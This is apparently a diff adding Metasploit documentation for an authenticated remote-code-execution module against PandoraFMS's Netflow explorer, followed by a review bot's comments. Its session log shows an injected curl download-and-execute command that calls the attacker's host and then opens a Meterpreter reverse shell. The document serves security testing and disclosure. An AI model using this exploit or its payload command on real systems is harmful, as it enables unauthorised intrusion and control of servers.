| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | +PandoraFMS offers multiple modules that can be turned on or off with an administrative account. |
| 4 | +One of them is Netflow, which is responsible for real-time network monitoring. |
| 5 | +It can collect network data and then report or dump it. |
| 6 | +Once Netflow is configured, it allows you to perform various tasks, such as viewing and exporting network data. |
| 7 | + |
| 8 | +The Netflow explorer contains a vulnerability when an unsanitized parameter from the Netflow configuration is placed into a string that gets executed using the exec() function. |
| 9 | + |
| 10 | +The PandoraFMS can be installed from [here](https://sourceforge.net/projects/pandora/files/Pandora%20FMS%207.0NG/777/Tarball/): |
| 11 | + |
| 12 | +1. Download vulnerable PandoraFMS |
| 13 | +2. Install webserver - Apache2, MySQL, PHP |
| 14 | +3. Following installation steps of PandoraFMS |
| 15 | +4. Run: `sudo apt install nfdump` |
| 16 | + |
| 17 | + |
| 18 | +## Verification Steps |
| 19 | + |
| 20 | +1. Install the application |
| 21 | +1. Start msfconsole |
| 22 | +1. Do: `use linux/http/pandora_fms_auth_netflow_rce` |
| 23 | +1. Do: `set rhosts [target IP]` |
| 24 | +1. Do: `set lhost [attacker IP]` |
| 25 | +1. Do: `set username [username]` |
| 26 | +1. Do: `set password [password]` |
| 27 | +1. Do: `run` |
| 28 | +1. You should get a shell. |
| 29 | + |
| 30 | +## Options |
| 31 | + |
| 32 | + |
| 33 | +### USERNAME |
| 34 | + |
| 35 | +Login username of existing user. |
| 36 | + |
| 37 | +### PASSWORD |
| 38 | + |
| 39 | +Login password of existing user. |
| 40 | + |
| 41 | +## Scenarios |
| 42 | + |
| 43 | +``` |
| 44 | +msf6 exploit(linux/http/pandora_fms_auth_netflow_rce) > set rhosts 192.168.168.146 |
| 45 | +msf6 exploit(linux/http/pandora_fms_auth_netflow_rce) > set PASSWORD pandora |
| 46 | +msf6 exploit(linux/http/pandora_fms_auth_netflow_rce) > set USERNAME admin |
| 47 | +msf6 exploit(linux/http/pandora_fms_auth_netflow_rce) > run verbose=true |
| 48 | +[*] Command to run on remote host: curl -so ./khZKmkFYijJ http://192.168.168.128:8080/M1We21fZKyvgtWK9IWStLA;chmod +x ./khZKmkFYijJ;./khZKmkFYijJ& |
| 49 | +[*] Fetch handler listening on 192.168.168.128:8080 |
| 50 | +[*] HTTP server started |
| 51 | +[*] Adding resource /M1We21fZKyvgtWK9IWStLA |
| 52 | +[*] Started reverse TCP handler on 192.168.168.128:4444 |
| 53 | +[*] 192.168.168.146:80 - Running automatic check ("set AutoCheck false" to disable) |
| 54 | +[*] 192.168.168.146:80 - Version 7.0.777 detected |
| 55 | +[+] 192.168.168.146:80 - The target is vulnerable. Vulnerable PandoraFMS version 7.0.777 detected |
| 56 | +[*] Client 192.168.168.146 requested /M1We21fZKyvgtWK9IWStLA |
| 57 | +[*] Sending payload to 192.168.168.146 (curl/7.68.0) |
| 58 | +[*] Meterpreter session 2 opened (192.168.168.128:4444 -> 192.168.168.146:54980) at 2025-06-25 12:27:52 +0200 |
| 59 | +
|
| 60 | +meterpreter > sysinfo |
| 61 | +Computer : 192.168.168.146 |
| 62 | +OS : Ubuntu 20.04 (Linux 5.15.0-136-generic) |
| 63 | +Architecture : x64 |
| 64 | +BuildTuple : x86_64-linux-musl |
| 65 | +Meterpreter : x64/linux``` |
| 66 | +
|
| 67 | +For example: |
| 68 | +
|
| 69 | +To do this specific thing, here's how you do it: |
| 70 | +
|
| 71 | +``` |
| 72 | +msf > use module_name |
| 73 | +msf auxiliary(module_name) > set POWERLEVEL >9000 |
| 74 | +msf auxiliary(module_name) > exploit |
| 75 | +``` |
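Review bot: the end of the Scenarios section still carries unedited placeholder text from the module documentation template (`For example:` / `To do this specific thing, here's how you do it:` / `msf auxiliary(module_name) > set POWERLEVEL >9000`) and should be deleted; in the same section the closing fence of the session output is fused to the last sysinfo line (`Meterpreter : x64/linux```), so move the three backticks onto their own line or the rendered block will not close. Two smaller points on the documentation itself: install step 3, `Following installation steps of PandoraFMS`, should read `Follow the installation steps of PandoraFMS`; and since the description says the Netflow module is turned on with an administrative account while the USERNAME/PASSWORD options only say `existing user`, please state which privilege level the credentials need (the scenario logs in as `admin`), and whether Netflow must already be enabled and configured before the module is run, as the Vulnerable Application section implies.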